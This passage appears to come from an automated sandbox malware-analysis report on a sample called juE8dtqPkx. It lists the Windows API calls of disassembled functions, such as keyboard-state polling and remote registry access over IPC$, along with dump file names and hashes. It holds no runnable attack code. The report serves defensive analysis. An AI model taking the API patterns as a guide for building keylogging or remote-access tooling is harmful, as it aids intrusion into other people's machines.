                                                    • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                    • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                    APIs
                                                    • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                    • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                    • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                    • _memmove.LIBCMT ref: 00467EB8
                                                    • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                    • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                    • _memmove.LIBCMT ref: 00467F6C
                                                    • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                    • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                    • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                    • String ID:
                                                    • API String ID: 2170234536-0
                                                    • Opcode ID: 4c3f0b1365acc363140b046ec90304d59d81b8d313fde973431f466ecda86ae7
                                                    • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                    • Opcode Fuzzy Hash: 4c3f0b1365acc363140b046ec90304d59d81b8d313fde973431f466ecda86ae7
                                                    • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 00453CE0
                                                    • SetKeyboardState.USER32(?), ref: 00453D3B
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                    • GetKeyState.USER32(000000A0), ref: 00453D75
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                    • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                    • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                    • GetKeyState.USER32(00000011), ref: 00453DEF
                                                    • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                    • GetKeyState.USER32(00000012), ref: 00453E26
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                    • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                    • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                    • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                    • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                    APIs
                                                    • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                    • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                    • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                    • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                    • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                    • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                    • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                    • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                    • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                    • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                    • String ID:
                                                    • API String ID: 3096461208-0
                                                    • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                    • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                    • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                    • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                    APIs
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                    • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                    • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                    • DeleteObject.GDI32(?), ref: 0047151E
                                                    • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                    • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                    • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                    • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                    • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                    • DeleteObject.GDI32(?), ref: 004715EA
                                                    • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                    • String ID:
                                                    • API String ID: 3218148540-0
                                                    • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                    • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                    • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                    • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                    • String ID:
                                                    • API String ID: 136442275-0
                                                    • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                    • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                    • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                    • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                    APIs
                                                    • _wcsncpy.LIBCMT ref: 00467490
                                                    • _wcsncpy.LIBCMT ref: 004674BC
                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                    • _wcstok.LIBCMT ref: 004674FF
                                                      • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                    • _wcstok.LIBCMT ref: 004675B2
                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                    • _wcslen.LIBCMT ref: 00467793
                                                    • _wcscpy.LIBCMT ref: 00467641
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                    • _wcslen.LIBCMT ref: 004677BD
                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                      • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                    • String ID: X
                                                    • API String ID: 3104067586-3081909835
                                                    • Opcode ID: 389f486f2d99b0acbbe2e832d5b999096831549b6c3d6258d1ea0558c1299e51
                                                    • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                    • Opcode Fuzzy Hash: 389f486f2d99b0acbbe2e832d5b999096831549b6c3d6258d1ea0558c1299e51
                                                    • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                    APIs
                                                    • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                    • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                    • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                    • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                    • _wcslen.LIBCMT ref: 0046CDB0
                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                    • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                    • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                      • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                      • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                      • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                    Strings
                                                    • NULL Pointer assignment, xrefs: 0046CEA6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                    • String ID: NULL Pointer assignment
                                                    • API String ID: 440038798-2785691316
                                                    • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                    • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                    • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                    • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                    APIs
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                    • _wcslen.LIBCMT ref: 004610A3
                                                    • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                    • GetWindowRect.USER32(?,?), ref: 00461248
                                                      • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                    • String ID: ThumbnailClass
                                                    • API String ID: 4136854206-1241985126
                                                    • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                    • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                    • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                    • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                    APIs
                                                    • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                    • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                    • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                    • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                    • GetClientRect.USER32(?,?), ref: 00471A1A
                                                    • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                    • DestroyIcon.USER32(?), ref: 00471AF4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                    • String ID: 2
                                                    • API String ID: 1331449709-450215437
                                                    • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                    • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                    • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                    • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                    • __swprintf.LIBCMT ref: 00460915
                                                    • __swprintf.LIBCMT ref: 0046092D
                                                    • _wprintf.LIBCMT ref: 004609E1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                    • API String ID: 3054410614-2561132961
                                                    • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                    • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                    • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                    • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                    APIs
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                    • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                    • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                    • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                    • API String ID: 600699880-22481851
                                                    • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                    • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                    • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                    • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: DestroyWindow
                                                    • String ID: static
                                                    • API String ID: 3375834691-2160076837
                                                    • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                    • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                    • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                    • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                    • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
